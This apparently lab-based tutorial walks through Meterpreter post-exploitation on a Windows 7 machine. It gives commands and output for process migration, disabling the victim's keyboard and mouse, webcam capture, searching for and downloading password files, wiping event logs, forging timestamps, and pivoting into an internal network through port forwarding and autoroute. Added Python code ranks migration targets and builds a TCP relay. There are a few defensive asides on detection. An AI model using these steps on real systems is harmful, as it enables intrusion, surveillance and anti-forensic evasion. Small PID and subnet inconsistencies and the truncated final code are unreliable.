
Post-exploitation: a Meterpreter guide

System commands

Basic system commands

sessions              # sessions -h shows the help
sessions -i <ID>      # interact with a session; sessions -k <ID> kills it
background            # send the current session to the background
run                   # run a module or script; type run and press Tab twice to list what is available
info                  # show a module's description and options
getuid                # the user the Meterpreter server is running as
getpid                # PID of the process hosting Meterpreter
sysinfo               # target system information
ps                    # list running processes; kill <PID> kills one
idletime              # how long the target's user has been idle
reboot / shutdown     # reboot / shut down the target
shell                 # drop into a cmd shell on the target
meterpreter > getuid
Server username: WIN-7\Win7
meterpreter > getpid
Current pid: 2852
meterpreter > sysinfo
Computer        : WIN-7
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : UKNOWSEC
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User        Path
 ---   ----  ----                     ----  -------  ----        ----
 0     0     [System Process]
 4     0     System
 248   500   svchost.exe
 268   4     smss.exe
 356   348   csrss.exe
 396   348   wininit.exe
 404   388   csrss.exe
 440   388   winlogon.exe
 500   396   services.exe
 508   396   lsass.exe
 516   396   lsm.exe
 628   500   svchost.exe
 648   500   svchost.exe
 688   500   vmacthlp.exe
 732   500   svchost.exe
 772   500   svchost.exe
 832   500   TrustedInstaller.exe
 860   500   svchost.exe
 900   500   svchost.exe
 1084  500   spoolsv.exe
 1112  500   svchost.exe
 1260  500   svchost.exe
 1272  500   sppsvc.exe
 1356  500   VGAuthService.exe
 1396  628   WmiPrvSE.exe
 1548  500   vmtoolsd.exe
 1764  500   ManagementAgentHost.exe
 1780  500   wmpnetwk.exe
 1908  500   svchost.exe
 2036  500   msdtc.exe
 2348  404   conhost.exe              x64   1        WIN-7\Win7  C:\Windows\System32\conhost.exe
 2356  2752  cmd.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\cmd.exe
 2532  500   svchost.exe
 2684  500   taskhost.exe             x64   1        WIN-7\Win7  C:\Windows\System32\taskhost.exe
 2736  860   dwm.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\dwm.exe
 2752  2728  explorer.exe             x64   1        WIN-7\Win7  C:\Windows\explorer.exe
 2852  3380  shell.exe                x86   1        WIN-7\Win7  C:\Users\Win7\Desktop\shell.exe
 2876  2752  vmtoolsd.exe             x64   1        WIN-7\Win7  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3048  500   SearchIndexer.exe
 3816  900   wuauclt.exe              x64   1        WIN-7\Win7  C:\Windows\System32\wuauclt.exe
 3824  500   svchost.exe

meterpreter > idletime
User has been idle for: 14 mins 20 secs

Note the sysinfo pair "Architecture: x64" and "Meterpreter: x86/windows": the payload is a 32-bit process running under WOW64 on a 64-bit host. That matters later, both for picking migration targets and for local exploit modules that refuse to run from a non-native session. Rows in the ps table without Arch/Session/User are processes the current token cannot open, which also means they cannot be migrated into.

uictl: enable or disable the keyboard and mouse

uictl [enable/disable] [keyboard/mouse/all]   # enable or disable keyboard / mouse input
uictl disable mouse       # disable the mouse
uictl disable keyboard    # disable the keyboard

meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl enable keyboard
Enabling keyboard...

webcam commands

webcam_list     # list webcams
webcam_snap     # take a picture with a webcam
webcam_stream   # stream live video from a webcam

execute: run a file

execute                     # run a file on the target
execute -H -i -f cmd.exe    # create a new cmd.exe process; -H hidden window, -i interactive channel

meterpreter > execute -H -i -f cmd.exe
Process 3616 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Win7\Desktop>

migrate: process migration

getpid          # PID of the current process
ps              # list running processes
migrate <PID>   # move the Meterpreter session into the process with that PID
kill <PID>      # kill a process

meterpreter > getpid
Current pid: 2852
meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User        Path
 ---   ----  ----                     ----  -------  ----        ----
 0     0     [System Process]
 4     0     System
 248   500   svchost.exe
 268   4     smss.exe
 356   348   csrss.exe
 396   348   wininit.exe
 404   388   csrss.exe
 440   388   winlogon.exe
 500   396   services.exe
 508   396   lsass.exe
 516   396   lsm.exe
 628   500   svchost.exe
 648   500   svchost.exe
 688   500   vmacthlp.exe
 732   500   svchost.exe
 772   500   svchost.exe
 832   500   TrustedInstaller.exe
 860   500   svchost.exe
 900   500   svchost.exe
 1084  500   spoolsv.exe
 1112  500   svchost.exe
 1260  500   svchost.exe
 1272  500   sppsvc.exe
 1356  500   VGAuthService.exe
 1396  628   WmiPrvSE.exe
 1548  500   vmtoolsd.exe
 1764  500   ManagementAgentHost.exe
 1780  500   wmpnetwk.exe
 1908  500   svchost.exe
 2036  500   msdtc.exe
 2348  404   conhost.exe              x64   1        WIN-7\Win7  C:\Windows\System32\conhost.exe
 2356  2752  cmd.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\cmd.exe
 2504  2752  calc.exe                 x64   1        WIN-7\Win7  C:\Windows\System32\calc.exe
 2532  500   svchost.exe
 2684  500   taskhost.exe             x64   1        WIN-7\Win7  C:\Windows\System32\taskhost.exe
 2736  860   dwm.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\dwm.exe
 2752  2728  explorer.exe             x64   1        WIN-7\Win7  C:\Windows\explorer.exe
 2852  3380  shell.exe                x86   1        WIN-7\Win7  C:\Users\Win7\Desktop\shell.exe
 2876  2752  vmtoolsd.exe             x64   1        WIN-7\Win7  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3048  500   SearchIndexer.exe
 3316  772   audiodg.exe              x64   0
 3816  900   wuauclt.exe              x64   1        WIN-7\Win7  C:\Windows\System32\wuauclt.exe
 3824  500   svchost.exe

meterpreter > migrate 2876
[*] Migrating from 3504 to 2876...
[*] Migration completed successfully.

Choose the target with care: it must be a process the current token can open (the same user, unless the session is already SYSTEM) and it should outlive the session, so a long-running process in the same logon session is a better host than a cmd.exe or calc.exe the user may close at any moment.

clearev: clear the event logs

clearev   # clears the Windows Application, System and Security logs

meterpreter > clearev
[*] Wiping 365 records from Application...
[*] Wiping 1222 records from System...
[*] Wiping 404 records from Security...

Clearing is itself recorded: Windows writes event 1102 ("the audit log was cleared") as the first entry of the emptied Security log and event 104 to the System log, and any records already forwarded to a log collector are untouched.
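The process table above is what you pick a migration target from. The following is an added example (not from the original post and not Metasploit code) that parses a constructed subset of that `ps` output and ranks processes as migration hosts. The ranking rules are this example's own heuristics: same logon session and user as the current process, skip short-lived console programs, and prefer the user's shell because it lives for the whole logon session.

```python
"""Rank processes from Meterpreter's `ps` table as migration targets.

Added example, not part of the original post or Metasploit. PS_OUTPUT is a
constructed subset of the `ps` listing shown above; the ranking rules are
this example's own heuristics.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

PS_OUTPUT = r"""
 PID   PPID  Name                     Arch  Session  User        Path
 ---   ----  ----                     ----  -------  ----        ----
 4     0     System
 508   396   lsass.exe
 2348  404   conhost.exe              x64   1        WIN-7\Win7  C:\Windows\System32\conhost.exe
 2356  2752  cmd.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\cmd.exe
 2736  860   dwm.exe                  x64   1        WIN-7\Win7  C:\Windows\System32\dwm.exe
 2752  2728  explorer.exe             x64   1        WIN-7\Win7  C:\Windows\explorer.exe
 2852  3380  shell.exe                x86   1        WIN-7\Win7  C:\Users\Win7\Desktop\shell.exe
 2876  2752  vmtoolsd.exe             x64   1        WIN-7\Win7  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3316  772   audiodg.exe              x64   0
 3816  900   wuauclt.exe              x64   1        WIN-7\Win7  C:\Windows\System32\wuauclt.exe
"""

# PID PPID Name, then optionally Arch Session, then optionally User Path (a path may contain spaces).
ROW = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+(\S+)"
    r"(?:\s+(x86|x64)\s+(\d+)(?:\s+(\S+)\s+(\S.*?))?)?\s*$"
)

# Console programs the user may close at any moment; losing the host process kills the session.
TRANSIENT = {"cmd.exe", "conhost.exe", "calc.exe", "notepad.exe"}
# The user's shell lives for the whole logon session.
LONG_LIVED = {"explorer.exe"}


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str]
    session: Optional[int]
    user: Optional[str]
    path: Optional[str]


def parse_ps(text: str) -> List[Proc]:
    """Parse the `ps` table; rows without Arch/Session/User (processes the token cannot open) keep None."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, separator and blank lines
        pid, ppid, name, arch, session, user, path = m.groups()
        procs.append(Proc(int(pid), int(ppid), name, arch,
                          int(session) if session is not None else None, user, path))
    return procs


def migration_candidates(procs: List[Proc], current_pid: int, host_arch: str = "x64") -> List[Proc]:
    """Processes the current token can plausibly migrate into, best first."""
    me = next(p for p in procs if p.pid == current_pid)
    cands = [p for p in procs
             if p.pid != current_pid
             and p.session == me.session and p.user == me.user
             and p.name.lower() not in TRANSIENT]
    # Sort key: long-lived first, then native-architecture hosts, then lowest PID.
    cands.sort(key=lambda p: (p.name.lower() not in LONG_LIVED, p.arch != host_arch, p.pid))
    return cands


if __name__ == "__main__":
    table = parse_ps(PS_OUTPUT)
    for p in migration_candidates(table, current_pid=2852):
        print(f"{p.pid:>5}  {p.arch}  {p.name:<14} {p.path}")
```

With the sample table and the session in shell.exe (PID 2852), the ranking puts explorer.exe first, then dwm.exe, vmtoolsd.exe and wuauclt.exe; System, lsass.exe and audiodg.exe fall out because they are not in the user's session, and cmd.exe and conhost.exe are skipped as transient.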

File system commands

Basic file system commands

getwd or pwd                                  # current working directory on the target
ls
cd
search -f *pass*                              # search for files; -h shows the help
cat c:\\lltest\\lltestpasswd.txt              # show a file's contents
upload /tmp/hack.txt C:\\lltest               # upload a file to the target
download c:\\lltest\\lltestpasswd.txt /tmp/   # download a file to the attacker's machine
edit c:\\1.txt                                # edit a file; it is created if it does not exist
rm C:\\lltest\\hack.txt
mkdir lltest2                                 # only creates a folder in the current directory
rmdir lltest2                                 # only removes a folder in the current directory
getlwd or lpwd                                # attacker side: show the current local directory
lcd /tmp                                      # attacker side: change the local directory

timestomp: forging timestamps

timestomp C:// -h                   # show the help
timestomp -v C://2.txt              # show the MACE timestamps of a file
timestomp C://2.txt -f C://1.txt    # copy 1.txt's timestamps onto 2.txt

meterpreter > timestomp -v C://2.txt
[*] Showing MACE attributes for C://2.txt
Modified      : 2018-12-18 00:48:02 -0500
Accessed      : 2018-12-18 00:48:02 -0500
Created       : 2018-12-17 22:52:59 -0500
Entry Modified: 2018-12-18 00:48:10 -0500
meterpreter > timestomp -v C://1.txt
[*] Showing MACE attributes for C://1.txt
Modified      : 2018-12-17 22:52:44 -0500
Accessed      : 2018-12-17 22:52:59 -0500
Created       : 2018-12-17 22:52:59 -0500
Entry Modified: 2018-12-17 22:52:59 -0500
meterpreter > timestomp C://2.txt -f C://1.txt
[*] Pulling MACE attributes from C://1.txt
[*] Setting specific MACE attributes on C://2.txt
meterpreter > timestomp -v C://2.txt
[*] Showing MACE attributes for C://2.txt
Modified      : 2018-12-17 22:52:44 -0500
Accessed      : 2018-12-17 22:52:59 -0500
Created       : 2018-12-17 22:52:59 -0500
Entry Modified: 2018-12-17 22:52:59 -0500

timestomp rewrites the four timestamps in the file's $STANDARD_INFORMATION attribute, which is what Explorer and dir display. The $FILE_NAME attribute in the same MFT record carries its own set of timestamps that this method does not touch, so a forensic comparison of the two attributes (or of the file against the USN journal) still exposes the tampering.
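The same copy-then-check idea on a POSIX filesystem, as an added example that is not from the original post and not Metasploit's code: os.utime() can set a file's atime and mtime, which is the portable part of what `timestomp -f` does, but the inode change time (ctime) is maintained by the kernel and cannot be set this way, so it plays the role that $FILE_NAME plays on NTFS. The files are created in a temporary directory, so nothing outside it is modified.

```python
"""Reproduce `timestomp dst -f src` on a POSIX file and show what a check still sees.

Added example, not Metasploit's code. os.utime() sets atime/mtime only; ctime is
kernel-maintained and stays at "now", just as NTFS keeps the $FILE_NAME timestamps
that timestomp does not rewrite. Sample files are constructed in a temp directory.
"""
import os
import tempfile
import time


def copy_timestamps(src: str, dst: str) -> None:
    """Give dst the same atime/mtime as src (what `timestomp dst -f src` does for those two fields)."""
    st = os.stat(src)
    os.utime(dst, ns=(st.st_atime_ns, st.st_mtime_ns))


def looks_timestomped(path: str, tolerance_s: float = 2.0) -> bool:
    """Heuristic: a normal write moves mtime and ctime together; rewriting mtime
    afterwards leaves ctime at 'now', so ctime well ahead of mtime is the tell."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance_s


def demo() -> dict:
    """Backdate 1.txt, copy its timestamps onto a fresh 2.txt, report what changed."""
    with tempfile.TemporaryDirectory() as d:
        old, new = os.path.join(d, "1.txt"), os.path.join(d, "2.txt")
        for p in (old, new):
            with open(p, "w") as f:
                f.write("constructed sample\n")
        # 1.txt stands in for a file that has been on disk for a day.
        day_ago = time.time() - 86400
        os.utime(old, (day_ago, day_ago))
        flagged_before = looks_timestomped(new)
        copy_timestamps(old, new)
        a, b = os.stat(old), os.stat(new)
        return {
            "mtime_matches": a.st_mtime_ns == b.st_mtime_ns,
            "atime_matches": a.st_atime_ns == b.st_atime_ns,
            "flagged_before": flagged_before,
            "flagged_after": looks_timestomped(new),
        }


if __name__ == "__main__":
    print(demo())
```

The copy succeeds (2.txt now shows 1.txt's modification and access times), yet the freshly created 2.txt is only flagged after the copy, because its ctime stayed at the moment of the rewrite. On Windows, Python reports creation time in st_ctime, so this particular heuristic applies to POSIX filesystems only.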

Network commands

Basic network commands

ipconfig / ifconfig
netstat -ano
arp
getproxy    # show the proxy settings
route       # show the routing table

meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:ba:a6:a7
MTU          : 1500
IPv4 Address : 192.168.130.128
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::c55f:725f:9e7d:7056
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:16ab
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
IPv6 Address : fe80::5efe:c0a8:8280
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

Interface 13
============
Name         : Teredo Tunneling Pseudo-Interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 14
============
Name         : Intel(R) PRO/1000 MT Network Connection #2
Hardware MAC : 00:0c:29:ba:a6:b1
MTU          : 1500
IPv4 Address : 192.168.22.171
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::b96b:f6e6:3371:444f
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > netstat -ano

Connection list
===============

 Proto  Local address                          Remote address        State        User  Inode  PID/Program name
 -----  -------------                          --------------        -----        ----  -----  ----------------
 tcp    0.0.0.0:135                            0.0.0.0:*             LISTEN       0     0      732/svchost.exe
 tcp    0.0.0.0:445                            0.0.0.0:*             LISTEN       0     0      4/System
 tcp    0.0.0.0:554                            0.0.0.0:*             LISTEN       0     0      1780/wmpnetwk.exe
 tcp    0.0.0.0:5357                           0.0.0.0:*             LISTEN       0     0      4/System
 tcp    0.0.0.0:49152                          0.0.0.0:*             LISTEN       0     0      396/wininit.exe
 tcp    0.0.0.0:49153                          0.0.0.0:*             LISTEN       0     0      772/svchost.exe
 tcp    0.0.0.0:49154                          0.0.0.0:*             LISTEN       0     0      900/svchost.exe
 tcp    0.0.0.0:49171                          0.0.0.0:*             LISTEN       0     0      508/lsass.exe
 tcp    0.0.0.0:49176                          0.0.0.0:*             LISTEN       0     0      500/services.exe
 tcp    0.0.0.0:49179                          0.0.0.0:*             LISTEN       0     0      1908/svchost.exe
 tcp    192.168.22.171:139                     0.0.0.0:*             LISTEN       0     0      4/System
 tcp    192.168.22.171:58500                   192.168.22.170:4444   ESTABLISHED  0     0      2876/vmtoolsd.exe
 tcp    192.168.22.171:58879                   192.168.22.170:4444   ESTABLISHED  0     0      1684/shell.exe
 tcp    192.168.130.128:139                    0.0.0.0:*             LISTEN       0     0      4/System
 tcp6   :::135                                 :::*                  LISTEN       0     0      732/svchost.exe
 tcp6   :::445                                 :::*                  LISTEN       0     0      4/System
 tcp6   :::554                                 :::*                  LISTEN       0     0      1780/wmpnetwk.exe
 tcp6   :::3587                                :::*                  LISTEN       0     0      3824/svchost.exe
 tcp6   :::5357                                :::*                  LISTEN       0     0      4/System
 tcp6   :::49152                               :::*                  LISTEN       0     0      396/wininit.exe
 tcp6   :::49153                               :::*                  LISTEN       0     0      772/svchost.exe
 tcp6   :::49154                               :::*                  LISTEN       0     0      900/svchost.exe
 tcp6   :::49171                               :::*                  LISTEN       0     0      508/lsass.exe
 tcp6   :::49176                               :::*                  LISTEN       0     0      500/services.exe
 tcp6   :::49179                               :::*                  LISTEN       0     0      1908/svchost.exe
 udp    0.0.0.0:123                            0.0.0.0:*                          0     0      248/svchost.exe
 udp    0.0.0.0:500                            0.0.0.0:*                          0     0      900/svchost.exe
 udp    0.0.0.0:3702                           0.0.0.0:*                          0     0      248/svchost.exe
 udp    0.0.0.0:3702                           0.0.0.0:*                          0     0      1260/svchost.exe
 udp    0.0.0.0:3702                           0.0.0.0:*                          0     0      248/svchost.exe
 udp    0.0.0.0:3702                           0.0.0.0:*                          0     0      1260/svchost.exe
 udp    0.0.0.0:4500                           0.0.0.0:*                          0     0      900/svchost.exe
 udp    0.0.0.0:5004                           0.0.0.0:*                          0     0      1780/wmpnetwk.exe
 udp    0.0.0.0:5005                           0.0.0.0:*                          0     0      1780/wmpnetwk.exe
 udp    0.0.0.0:5355                           0.0.0.0:*                          0     0      648/svchost.exe
 udp    0.0.0.0:52358                          0.0.0.0:*                          0     0      1260/svchost.exe
 udp    0.0.0.0:58751                          0.0.0.0:*                          0     0      648/svchost.exe
 udp    0.0.0.0:62445                          0.0.0.0:*                          0     0      248/svchost.exe
 udp    0.0.0.0:65389                          0.0.0.0:*                          0     0      248/svchost.exe
 udp    127.0.0.1:1900                         0.0.0.0:*                          0     0      1260/svchost.exe
 udp    127.0.0.1:50203                        0.0.0.0:*                          0     0      508/lsass.exe
 udp    127.0.0.1:52360                        0.0.0.0:*                          0     0      648/svchost.exe
 udp    127.0.0.1:55889                        0.0.0.0:*                          0     0      1260/svchost.exe
 udp    127.0.0.1:64192                        0.0.0.0:*                          0     0      900/svchost.exe
 udp    192.168.22.171:137                     0.0.0.0:*                          0     0      4/System
 udp    192.168.22.171:138                     0.0.0.0:*                          0     0      4/System
 udp    192.168.22.171:1900                    0.0.0.0:*                          0     0      1260/svchost.exe
 udp    192.168.22.171:55887                   0.0.0.0:*                          0     0      1260/svchost.exe
 udp    192.168.130.128:137                    0.0.0.0:*                          0     0      4/System
 udp    192.168.130.128:138                    0.0.0.0:*                          0     0      4/System
 udp    192.168.130.128:1900                   0.0.0.0:*                          0     0      1260/svchost.exe
 udp    192.168.130.128:55888                  0.0.0.0:*                          0     0      1260/svchost.exe
 udp6   :::123                                 :::*                               0     0      248/svchost.exe
 udp6   :::500                                 :::*                               0     0      900/svchost.exe
 udp6   :::3540                                :::*                               0     0      3824/svchost.exe
 udp6   :::3702                                :::*                               0     0      248/svchost.exe
 udp6   :::3702                                :::*                               0     0      1260/svchost.exe
 udp6   :::3702                                :::*                               0     0      248/svchost.exe
 udp6   :::3702                                :::*                               0     0      1260/svchost.exe
 udp6   :::4500                                :::*                               0     0      900/svchost.exe
 udp6   :::5004                                :::*                               0     0      1780/wmpnetwk.exe
 udp6   :::5005                                :::*                               0     0      1780/wmpnetwk.exe
 udp6   :::5355                                :::*                               0     0      648/svchost.exe
 udp6   :::52359                               :::*                               0     0      1260/svchost.exe
 udp6   :::62446                               :::*                               0     0      248/svchost.exe
 udp6   :::65390                               :::*                               0     0      248/svchost.exe
 udp6   ::1:1900                               :::*                               0     0      1260/svchost.exe
 udp6   ::1:55886                              :::*                               0     0      1260/svchost.exe
 udp6   fe80::b96b:f6e6:3371:444f:1900         :::*                               0     0      1260/svchost.exe
 udp6   fe80::b96b:f6e6:3371:444f:55884        :::*                               0     0      1260/svchost.exe
 udp6   fe80::c55f:725f:9e7d:7056:546          :::*                               0     0      772/svchost.exe
 udp6   fe80::c55f:725f:9e7d:7056:1900         :::*                               0     0      1260/svchost.exe
 udp6   fe80::c55f:725f:9e7d:7056:55885        :::*                               0     0      1260/svchost.exe

meterpreter > arp

ARP cache
=========

 IP address       MAC address        Interface
 ----------       -----------        ---------
 192.168.22.2     00:50:56:f2:7a:67  14
 192.168.22.170   00:0c:29:92:d5:46  14
 192.168.22.254   00:50:56:f5:66:dc  14
 192.168.22.255   ff:ff:ff:ff:ff:ff  14
 192.168.130.129  00:0c:29:74:6d:d0  11
 192.168.130.254  00:50:56:f7:97:52  11
 192.168.130.255  ff:ff:ff:ff:ff:ff  11
 224.0.0.22       00:00:00:00:00:00  1
 224.0.0.22       01:00:5e:00:00:16  11
 224.0.0.22       01:00:5e:00:00:16  14
 224.0.0.252      01:00:5e:00:00:fc  11
 224.0.0.252      01:00:5e:00:00:fc  14
 239.255.255.250  00:00:00:00:00:00  1
 239.255.255.250  01:00:5e:7f:ff:fa  11
 239.255.255.250  01:00:5e:7f:ff:fa  14
 255.255.255.255  ff:ff:ff:ff:ff:ff  11
 255.255.255.255  ff:ff:ff:ff:ff:ff  14

meterpreter > getproxy
Auto-detect     : Yes
Auto config URL :
Proxy URL       :
Proxy Bypass    :

meterpreter > route

IPv4 network routes
===================

 Subnet           Netmask          Gateway          Metric  Interface
 ------           -------          -------          ------  ---------
 0.0.0.0          0.0.0.0          192.168.22.2     10      14
 127.0.0.0        255.0.0.0        127.0.0.1        306     1
 127.0.0.1        255.255.255.255  127.0.0.1        306     1
 127.255.255.255  255.255.255.255  127.0.0.1        306     1
 192.168.22.0     255.255.255.0    192.168.22.171   266     14
 192.168.22.171   255.255.255.255  192.168.22.171   266     14
 192.168.22.255   255.255.255.255  192.168.22.171   266     14
 192.168.130.0    255.255.255.0    192.168.130.128  266     11
 192.168.130.128  255.255.255.255  192.168.130.128  266     11
 192.168.130.255  255.255.255.255  192.168.130.128  266     11
 224.0.0.0        240.0.0.0        127.0.0.1        306     1
 224.0.0.0        240.0.0.0        192.168.130.128  266     11
 224.0.0.0        240.0.0.0        192.168.22.171   266     14
 255.255.255.255  255.255.255.255  127.0.0.1        306     1
 255.255.255.255  255.255.255.255  192.168.130.128  266     11
 255.255.255.255  255.255.255.255  192.168.22.171   266     14

No IPv6 routes were found.

Two things in this output drive the rest of the section. First, the ESTABLISHED connections to 192.168.22.170:4444 are held by 2876/vmtoolsd.exe, the process the session was migrated into above, and by 1684/shell.exe, a second session: the socket moves with the migration, so the original dropper is no longer the process a defender sees talking to the handler. Second, the host has a second NIC on 192.168.130.0/24 (interface 11), which is the internal network the port forwarding, routing and proxying below are used to reach.

portfwd: port forwarding

portfwd add -l 6666 -p 3389 -r 127.0.0.1      # relay the target's port 3389 to local port 6666
portfwd delete -l 6666 -p 3389 -r 127.0.0.1   # remove that relay
portfwd list                                  # show active relays
portfwd flush                                 # remove all relays

-r is the host as seen from the target, so 127.0.0.1 means the target itself; any other address the target can reach works the same way. By default the listener is created on 0.0.0.0 of the attacker host (see "Local TCP relay created: :6666" and "0.0.0.0:6666" below), which exposes the forwarded RDP service to anyone who can reach the attacking machine; add -L 127.0.0.1 to bind it to loopback only.

meterpreter > portfwd add -l 6666 -p 3389 -r 127.0.0.1
[*] Local TCP relay created: :6666 <-> 127.0.0.1:3389
meterpreter > portfwd delete -l 6666 -p 3389 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:6666
meterpreter > portfwd list

Active Port Forwards
====================

 Index  Local         Remote          Direction
 -----  -----         ------          ---------
 1      0.0.0.0:6666  127.0.0.1:3389  Forward

1 total active port forwards.

meterpreter > portfwd flush
[*] Successfully stopped TCP relay on 0.0.0.0:6666
[*] Successfully flushed 1 rules
meterpreter > portfwd list
No port forwards are currently active.

~# rdesktop 127.0.0.1:6666
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16

autoroute: adding routes

run autoroute -h                      # show the help
run autoroute -s 192.168.159.0/24     # add a route into the target's internal network
run autoroute -p                      # show the added routes

meterpreter > run autoroute -h
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
[*]   run autoroute -s 10.10.10.1                  # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1/24               # CIDR notation is also okay
[*]   run autoroute -p                             # Print active routing table
[*]   run autoroute -d -s 10.10.10.1               # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module
meterpreter > run autoroute -s 192.168.130.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.130.0/255.255.255.0...
[+] Added route to 192.168.130.0/255.255.255.0 via 192.168.22.171
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.130.0      255.255.255.0      Session 1

The script is deprecated; the equivalent module call is run post/multi/manage/autoroute SUBNET=192.168.130.0/24 (CMD=print lists the table). Either way the route exists inside the Metasploit framework, not on the target: it tells msfconsole to send traffic for 192.168.130.0/24 through session 1, so it only affects Metasploit modules. External tools need the SOCKS proxy described next.

With the route in place, arp_scanner, portscan and similar modules can be pointed at the internal subnet (arp_scanner is a post module and runs on the target itself; auxiliary modules such as portscan/tcp run from msfconsole and reach the subnet through the route):

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.130.0/24
[*] Running module against WIN-7
[*] ARP Scanning 192.168.130.0/24
[+] IP: 192.168.130.1 MAC 00:50:56:c0:00:02 (VMware, Inc.)
[+] IP: 192.168.130.128 MAC 00:0c:29:ba:a6:a7 (VMware, Inc.)
[+] IP: 192.168.130.129 MAC 00:0c:29:74:6d:d0 (VMware, Inc.)
[+] IP: 192.168.130.255 MAC 00:0c:29:ba:a6:a7 (VMware, Inc.)
[+] IP: 192.168.130.254 MAC 00:50:56:f7:97:52 (VMware, Inc.)
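The mechanism behind `portfwd add -l 6666 -p 3389 -r 127.0.0.1` is a plain TCP relay: accept on the local port, open the remote side, pump bytes in both directions. The block below is an added example, not Metasploit's implementation: Meterpreter opens the remote side from inside the target process over the session channel, whereas here both ends are ordinary sockets on one host so it can run stand-alone. The upper-casing echo server is a constructed stand-in for the service being forwarded (RDP on 3389 in the post).

```python
"""A minimal local TCP relay, the mechanism behind Meterpreter's `portfwd add`.

Added example, not Metasploit's code. Both ends are local sockets so it runs
stand-alone; the echo server is a constructed stand-in for the forwarded service.
"""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then half-close the destination so the peer sees EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_relay(listen_host: str, listen_port: int, remote_host: str, remote_port: int) -> int:
    """Listen on (listen_host, listen_port); for each client connect to the remote side and
    pump both directions. Returns the bound port (useful when listen_port is 0)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            client, _ = srv.accept()
            try:
                remote = socket.create_connection((remote_host, remote_port), timeout=5)
            except OSError:
                client.close()  # remote side unreachable: drop the client, keep serving
                continue
            threading.Thread(target=_pump, args=(client, remote), daemon=True).start()
            threading.Thread(target=_pump, args=(remote, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server(host: str = "127.0.0.1") -> int:
    """Constructed stand-in for the forwarded service: echoes everything back upper-cased."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(16)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def roundtrip(port: int, payload: bytes) -> bytes:
    """Connect to the relay's listening port, send payload, return everything that comes back."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            d = s.recv(4096)
            if not d:
                break
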